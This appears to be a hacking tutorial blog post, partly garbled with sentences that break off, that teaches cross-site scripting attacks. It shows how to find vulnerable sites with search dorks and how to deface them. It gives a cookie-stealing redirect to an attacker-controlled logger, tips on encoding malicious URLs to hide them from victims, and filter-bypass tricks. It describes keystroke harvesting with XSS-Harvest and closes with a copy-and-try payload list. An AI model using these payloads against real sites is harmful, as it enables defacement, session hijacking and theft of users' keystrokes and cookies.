Cross Site Scripting (XSS)
‘XSS’ also known as ‘CSS’ – Cross Site Scripting. It is a very common vulnerability
found in Web Applications, ‘XSS’ allows the attacker to INSERT malicous code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an “attacker” to inject some code into the applications affected in order to bypass access to the website or to apply “phishing” on falls users. This technique is also used for website Hacking. Types of XSS:
DOM-Based : The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine: the various operative system usually includes “since born” some HTML pages created for differents aims, but as long as the humans do mistakes this HTML pages often can be exploited due to code vulnerabilities. The DOM-Based XSS exploits these problems on users local machines in this way: Non-Persistent : The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It’s commonly named as “non-persistent” because it works on an immediate HTTP response from the victim website: it show up when the webpage get the data provided by the attacker’s client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result. The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website Persistent : The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users informations and the difference is that in websites vulnerables to Persistent XSS the attacker doesn’t need to This works when the tool provided (the guestbook in the example) doesn’t do any
To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box’s, there are too many to mention. Using ‘Google Dorks’ to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:”search.php?q=” now that is a common page and has alot Basics of XSS: <script>alert(“Priyanshu”)</script> now this will alert a popup message, saying “Priyanshu” without quotes. So,use “search.php?q=” and you can simple try the following on a website with the http://website.com/search.php?q=<script>alert(“Priyanshu”)</script> There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript : http://website.com/search.php?q=<br><br><b><u>Priyanshu</u></b> if you see the bold text on the page and newlines then you knows its vulnerable. Example: How to Deface a Website using XSS ? <html><body><IMG SRC=”http://website.com/yourDefaceIMAGE.png”></body></html> ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything <IMG SRC=”http://site.com/yourDefaceIMAGE.png”> The other tags are not needed has the page will already have them. Ok it helps to http://site.com/xss.swfwindow.open( “http://www.hackersonlineclub.tk/” )</script> There are many others ways that you can found using Google or other website. How to Cookie Stealing using XSS ? How To Make A Cookie Stealer Php script ? ok now you have it save it has a .php file and upload to your server, remember to window.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen but now you ask what if my site has not got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code http://site.com/search.php?q=document.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie
‘)alert(‘xss’); that will do the same thing has <script>alert(“XSS”)</script> on a vulnerable server. Some other ways to bypass filtration Advanced XSS – way to bypass magic quotes filtration: http://www.asciitable.com/ This will help you write what you want, In my examples ill be writing “HOC” this is the following code 72 79 67 Ok now we got the Decimal value of our string, we need to know what function in javascript converts this. String.fromCharCode() is suitable for this kinda things, its easy to setup, im gona give it my args below. String.fromCharCode(72, 79, 67) Ok now “String.fromCharCode(72, 79, 67)” Is a JAVA (ASCII) way of saying “HOC”. <script>alert(String.fromCharCode(72, 79, 67))</script> For More Script Coding Of XSS Visit Source:http://ha.ckers.org |
XSS-Harvest:- Harvesting Cross Site Scripting, Clicks, Keystrokes and Cookies Even today many of us still do not understand the impact of an exploited XSS vulnerability, and I include the security community in this statement. To summarise, a successfully exploited XSS vulnerability will allow the interception of ALL keystrokes, ALL mouse actions, ALL cookies (unless protected by scope) on ALL pages of the affect domain, regardless of whether or not the vulnerability is “reflected” or “persistent”.XSS-Harvest is multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool. * Infection script adds relevant event listeners (keystrokes, onload() and mouse clicks) to the vulnerable page and sets up communication with the XSS-Harvest server. How to Exploit XSS with XSS-Harvest? Understand the markup of the page. You should be looking to insert syntactically correct <script></script> tags in to the source of the vulnerable page. Most attackers will insert something like ‘<script>alert(1)</script>’ at this stage to ensure the page is actually vulnerable. Start the XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (default port is 80), or as a limited user on a port > 1024 using the -p option. To start the server you must instruct it to listen with the -l option. Insert the following ‘injection string’ into the vulnerable page: This will return the client-side JavaScript to the victim, indicated by the ‘i’ in the URL. ./xss-harvest.pl -l -r http://vulnerablepage.local/login.html Basic dependencies: –> New:- Advance Scripts To Find XSS Vulnerabilities In Websites.
Just Copy any script and try ..
To Redirect exploit code:
‘;redirecturl=’javascript:alert(“XSS”) Now for XSS
Example: www. xyz.com?q=” XSS Script”
<body onload=alert(1)> “><%2Fstyle<%2Fscript><script>confirm(“XSS By Priyanshu”)<%2Fscript> <body onload=document.getElementById(“xsrf”).submit()> <a href=”data:text/html;based64_,<svg/onload=\u0061l&101%72t(1)>”>X</a <a href=”data:text/html;based64_,<svg/onload=\u0061l&101%72t(document.cookie)>”>X</a
<img src=x onerror=alert(document.domain)> x”></script><img src=x onerror=alert(1)> q=” onclick=”alert(/XSS/) “>http://a
<img src=x onerror=prompt(1);> by “> “><img src=x onerror=prompt(0)>.txt.jpg “><img src=x onerror=alert(document.cookie)> “><img src=x onerror=prompt(1);> “><script>alert(‘XSS’)</script> id=abc”><Script>alert(/xss/)</SCRIPT> “><img src=” ” onMouseover=prompt(/xss/);> Default.aspx/” onmouseout=”confirm(1)’x=” |